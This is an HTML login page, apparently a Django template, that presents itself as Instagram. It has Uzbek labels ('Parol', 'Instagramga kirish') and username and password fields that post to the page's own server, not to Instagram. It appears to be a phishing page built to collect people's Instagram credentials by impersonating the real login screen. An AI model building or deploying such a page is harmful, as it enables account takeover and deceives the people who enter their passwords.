<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Instagram</title>
</head>
<body>
<style>
body {
  background-image: url("https://w.forfun.com/fetch/59/59a6f52a1ebe6b0733e1dfb19832762d.jpeg");
  background-size: cover;
  background-repeat: no-repeat;
  display: flex;
  justify-content: center;
  align-items: center;
  height: 100vh;
}

.login-form {
  max-width: 500px;
  padding: 20px;
  background-color: rgba(255,100,100);
  border-radius: 5px;
}

.form-group {
  margin-bottom: 15px;
}

label {
  display: block;
  font-weight: bold;
}

input[type="text"],
input[type="password"] {
  width: 100%;
  padding: 8px;
  border: 2px solid #ccc;
  border-radius: 5px;
}

input[type="submit"] {
  background-color: #4CAF50;
  color: black;
  font-weight: bold;
  padding: 10px 20px;
  border: none;
  border-radius: 10px;
  cursor: pointer;
}
</style>

<form method="POST" class="login-form">
  {% csrf_token %}
  <div class="form-group">
    <label for="username">Nake_name:</label>
    <input type="text" id="username" name="username" required>
  </div>

  <div class="form-group">
    <label for="password">Parol:</label>
    <input type="password" id="password" name="password" required>
  </div>

  <input class="btn btn--radius-2 btn--red" type="submit" value="Instagramga kirish">
</form>
</body>
</html>